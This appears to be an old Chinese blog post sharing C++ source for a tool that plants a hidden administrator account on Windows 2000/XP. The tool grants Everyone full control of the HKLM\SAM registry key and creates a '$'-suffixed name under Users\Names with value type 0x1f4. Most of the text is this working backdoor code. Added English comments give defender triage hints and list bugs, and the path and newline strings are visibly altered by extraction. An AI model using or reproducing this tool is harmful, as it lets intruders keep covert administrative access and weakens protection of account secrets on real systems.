關於增加一個隱藏帳號,
在註冊表增加如下:
所以把這個[HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/A$]
@=hex(1f4):
對2000和xp有效,但是重啟之後,進入管理工具中無法開啟使用者一欄
xp中啟動介面只能夠用經典的登陸,即輸入兩次ctrl+alt+del才可以!
代碼是參考網上的,很簡單,只是增加了以上的註冊表鍵值!
xp+vs.net 2003編譯通過
// creatadmin.cpp : 定義控制台應用程式的進入點。
//
#include "stdafx.h"
#include <Windows.h>
#include <Aclapi.h>
/* 在註冊表sam鍵下面的SAM//SAM//Domains//Account//Users//Names新加一個帶"$"的使用者就可以實現隱藏;在2000,xp下測試
問題:2000下重啟後在電腦管理工具中的本機使用者和組將無法再顯示
xp的啟動介面只能夠由經典的登陸模式,即雙擊ctrl+alt+del登陸!!!*/
/*
 * Console entry point. Expects exactly one argument: an account name that
 * ends in '$'. It then
 *   1. reads the DACL of the registry object named by SamName,
 *   2. adds an ACE granting "Everyone" KEY_ALL_ACCESS (inherited by children),
 *   3. opens the Users/names key with KEY_ALL_ACCESS and creates a subkey
 *      named after the argument,
 *   4. sets that subkey's default value with value type 0x1f4 and no data,
 *   5. re-applies the original DACL and frees what it allocated.
 *
 * String literals are kept exactly as they appear on the page; the path
 * separators and "/n" sequences look altered by text extraction.
 *
 * Review notes for defenders:
 *   - Between step 2 and step 5 the SAM key carries an Everyone/full-control
 *     ACE. The restore runs only at FreeAndExit and its result is not checked,
 *     so a failed restore or a killed process leaves the permissive DACL in
 *     place. An unexpected Everyone ACE on HKLM\SAM is worth checking for
 *     during host triage.
 *   - Both the permission change and the new subkey under
 *     HKLM\SAM\SAM\Domains\Account\Users\Names are registry writes that
 *     object-access auditing or an EDR registry rule can record. A '$'-suffixed
 *     name under Names that is not a known machine account deserves review.
 *   - Modifying the DACL of HKLM\SAM presumably requires administrative
 *     rights already (WRITE_DAC on the key) - confirm on the target OS.
 */
void _tmain(int argc, _TCHAR* argv[])
{
// NOTE(review): 'sam' is never used below, and <string> is not among the
// includes visible in this file.
std::string sam = "SAM//SAM//Domains//Account//Users//Names";
// Usage check: exactly one argument (the account name) is required.
if (argc != 2)
{
printf("Welcome to Http://systest2005.52blog.net/nmail to:systest2005@126.com!");
printf("/nYou must input the name of administrators you want to create!");
printf("/nUsage:%s name",argv[0] );
printf("/n<name> must end with $");
exit(0);
}
// NOTE(review): an empty argv[1] gives n == 0, so argv[1][n-1] reads one
// byte before the string.
int n = strlen(argv[1]);
// The name has to end in '$'; anything else is rejected.
if (argv[1][n-1] != '$')
{
printf("The name must end with $");
exit(0);
}
char *s = argv[1];
/* The code below was found online; the author does not know its original source. */
DWORD dwRet;
LPSTR SamName = "MACHINE//SAM//SAM";
PSECURITY_DESCRIPTOR pSD = NULL;   // security descriptor returned by GetNamedSecurityInfo; freed at exit
PACL pOldDacl = NULL;              // DACL as it was before the change; re-applied at FreeAndExit
PACL pNewDacl = NULL;              // old DACL plus the added Everyone ACE
EXPLICIT_ACCESS ea;
HKEY hKey = NULL;                  // handle to the Users/names key
HKEY mkey = NULL;                  // handle to the newly created name subkey
// Fetch the current DACL of the SAM key so it can be extended and later restored.
dwRet = GetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, &pOldDacl, NULL, &pSD);
if (dwRet != ERROR_SUCCESS)
{
printf("GetNamedSecurityInfo Error: %d/n", dwRet);
goto FreeAndExit;
}
// Build an ACE that gives Everyone full control of the key and lets child
// objects inherit it. This is the step that weakens the SAM key's protection.
ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
BuildExplicitAccessWithName(&ea, "Everyone", KEY_ALL_ACCESS, SET_ACCESS,
SUB_CONTAINERS_AND_OBJECTS_INHERIT);
// Merge the new ACE with the existing DACL into pNewDacl.
dwRet = SetEntriesInAcl(1, &ea, pOldDacl, &pNewDacl);
if (dwRet != ERROR_SUCCESS)
{
printf("SetEntriesInAcl Error: %d/n", dwRet);
goto FreeAndExit;
}
// Apply the widened DACL to the SAM key.
dwRet = SetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, pNewDacl, NULL);
if (dwRet != ERROR_SUCCESS)
{
printf("SetNamedSecurityInfo Error: %d/n", dwRet);
goto FreeAndExit;
}
// Open the SAM subkey that holds the account names.
dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SAM//SAM//Domains//Account//Users//names//",
0, KEY_ALL_ACCESS, &hKey);
if (dwRet != ERROR_SUCCESS)
{
printf("Reg Open Key Error: %d/n", dwRet);
goto FreeAndExit;
}
// Create (or open, if it already exists) a subkey named after the argument.
dwRet = RegCreateKey(hKey,s,&mkey);
if (dwRet != ERROR_SUCCESS)
{
printf("Reg CreatKey Error: %d/n", dwRet);
goto FreeAndExit;
}
// Set the subkey's default value (name NULL) with value *type* 0x1f4, no
// data and zero length. The third argument is the API's reserved parameter.
// NOTE(review): 0x1f4 is 500, presumably the built-in Administrator RID - confirm.
dwRet = RegSetValueEx(mkey,NULL,NULL,0x1f4,NULL,0);
if (dwRet != ERROR_SUCCESS)
{
// NOTE(review): mkey is not closed on this path; FreeAndExit only closes hKey.
printf("set Key value Error: %d/n", dwRet);
goto FreeAndExit;
}
printf("create SAM Subkey Successfully./n");
// NOTE(review): hKey is closed here and, because it is not reset to NULL,
// closed a second time at FreeAndExit on the success path.
RegCloseKey(hKey);
RegCloseKey(mkey);
FreeAndExit:
if (hKey) RegCloseKey(hKey);
if (pNewDacl) LocalFree(pNewDacl);
// Restore the original DACL of the SAM key. The return value is ignored, so a
// failed restore is silent and leaves the Everyone ACE in place.
if (pOldDacl) SetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, pOldDacl, NULL);
// pOldDacl is not freed separately; only pSD is released.
if (pSD) LocalFree(pSD);
return ;
}